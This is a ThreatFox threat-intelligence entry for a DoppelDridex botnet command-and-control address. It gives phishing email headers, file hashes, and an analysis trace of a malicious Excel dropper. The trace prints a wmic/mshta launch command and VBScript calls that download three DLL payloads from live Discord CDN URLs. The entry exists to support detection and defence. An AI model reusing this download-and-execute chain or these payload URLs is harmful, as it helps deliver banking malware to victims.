ThreatFox IOC Database

You are viewing the ThreatFox database entry for ip:port 45.90.108.123:13786.

Database Entry


IOC ID:233351
IOC: 45.90.108.123:13786
IOC Type :ip:port
Threat Type :botnet_cc
Malware: DoppelDridex
Confidence Level : Confidence level is high (100%)
First seen:2021-10-13 15:28:42 UTC
Last seen:never
UUID:3f3129bd-2c3a-11ec-a35f-42010aa4000a
Reporter @AndreGironda
Reward 5 credits from ThreatFox
Tags:22202 DoppelDridex Dridex DridexLoader
Reference: https://tria.ge/211013-sh83paeea2

Twitter
@AndreGironda
MITRE T1566.001
Date: Wed, 13 Oct 2021 14:30-15:00 +0000 (UTC)
Received: from ip-95-223-229-201.hsi16.unitymediagroup.de ([95.223.229.201]:54360 helo=[172.21.0.12])
MIME-Version: 1.0
Content-Type: multipart/mixed; charset="utf-8"; boundary="===============0883403505962461874=="
Content-Transfer-Encoding: base64
X-Mailer: Sendinblue
Content-Language: en-US
X-aid: 5.4 (13.10.2021 14:35:54)
Reply-To: ruddimanfinancial.com
Message-ID: <163413575407.32250.3305014212405205561@ruddimanfinancial.com>
From: Walter Ruddiman <walt@ruddimanfinancial.com>
Subject: Invoice#WIHS failed
Attachment Name: Payment_WIHS.xlsb
Maldoc excel40_hunter SHA256: c1061105c5a447dc394c3264769360d417ce48c49c4d02670580253f12a93335

wmic process call create 'mshta C:\ProgramData\FfIbKOVWpwA.rtf'

Unpacked VBScript File Name: FfIbKOVWpwA.rtf
VBScript VBA_Object SHA256: e3f9616043cbb094bc4b387eda1bcf7a6e7b1e4f4990a52c8770dad16b7333b8

CreateObject - params ['Wscript.Shell'] - Interesting Function Call
createobject - params ['MSXML2.XMLHTTP.6.0'] - Interesting Function Call
createobject - params ['Adodb.Stream'] - Interesting Function Call
qlQmoypY.Open - params ['GET', 'https://cdn.discordapp.com/attachments/897820678932275224/897822586963132416/2_kbd101c.dll', False] - Interesting Function Call
Object.Method Call - params ['GET', 'https://cdn.discordapp.com/attachments/897820678932275224/897822586963132416/2_kbd101c.dll', False] - qlQmoypY.Open
GET - params 'https://cdn.discordapp.com/attachments/897820678932275224/897822586963132416/2_kbd101c.dll' - Interesting Function Call
Object.Method Call - params ['User-Agent', 'syWugavr'] - qlQmoypY.setRequestHeader
Set HTTP Header - params "'User-Agent' ==> 'syWugavr'" - ServerXMLHTTP::SetRequestHeader()
createobject - params ['MSXML2.XMLHTTP.6.0'] - Interesting Function Call
createobject - params ['Adodb.Stream'] - Interesting Function Call
qlQmoypY.Open - params ['GET', 'https://cdn.discordapp.com/attachments/897820678932275224/897822593107771462/5_WfHC.dll', False] - Interesting Function Call
Object.Method Call - params ['GET', 'https://cdn.discordapp.com/attachments/897820678932275224/897822593107771462/5_WfHC.dll', False] - qlQmoypY.Open
GET - params 'https://cdn.discordapp.com/attachments/897820678932275224/897822593107771462/5_WfHC.dll' - Interesting Function Call
Object.Method Call - params ['User-Agent', 'syWugavr'] - qlQmoypY.setRequestHeader
Set HTTP Header - params "'User-Agent' ==> 'syWugavr'" - ServerXMLHTTP::SetRequestHeader()
createobject - params ['MSXML2.XMLHTTP.6.0'] - Interesting Function Call
createobject - params ['Adodb.Stream'] - Interesting Function Call
qlQmoypY.Open - params ['GET', 'https://cdn.discordapp.com/attachments/897820678932275224/897822596857483264/9_shlwapi.dll', False] - Interesting Function Call
Object.Method Call - params ['GET', 'https://cdn.discordapp.com/attachments/897820678932275224/897822596857483264/9_shlwapi.dll', False] - qlQmoypY.Open
GET - params 'https://cdn.discordapp.com/attachments/897820678932275224/897822596857483264/9_shlwapi.dll' - Interesting Function Call

Stage 1 URL: hXXps://cdn.discordapp[.]com/attachments/897820678932275224/897822586963132416/2_kbd101c.dll
Stage 2 URL: hXXps://cdn.discordapp[.]com/attachments/897820678932275224/897822593107771462/5_WfHC.dll
Stage 3 URL: hXXps://cdn.discordapp[.]com/attachments/897820678932275224/897822596857483264/9_shlwapi.dll
Stage 1 DLL SHA256: b8e4c68f8843fe8f2f12d5cc636c824a338ddaa24feee9e9e5e380169b07b231
Stage 2 DLL SHA256: 0d9a0d05c7ba4ae81904e64f66235e032ded422aa95de11b8a9691123f911885
Stage 3 DLL SHA256: 653aa17fbf6949e5bdba2599a9a3df4bb8ec259a5cf0eb7c3b08b6813c4283e7

Unpacked Dridex Executable SHA256: 0ea6ed1ee6298eb71fa135ab752fee0ea57d6d371de0c4d9970a44b2788f93af
Unpacked DoppelDridex DLL 1 SHA256: 417bdeeb9311bb71d7c3210ca72ca043e97369ce84ba6ff34de79c0d58a0db65
Unpacked DoppelDridex DLL 2 SHA256: f19f31f9ad39899254bfdd1f13d412ea69b20039649996271b17dc8de4c96a39
Unpacked DoppelDridex DLL 3 SHA256: 5a5a26b6b1c6fd568d0864c5364483e8645d5a884846b037979eb1a86d411ab2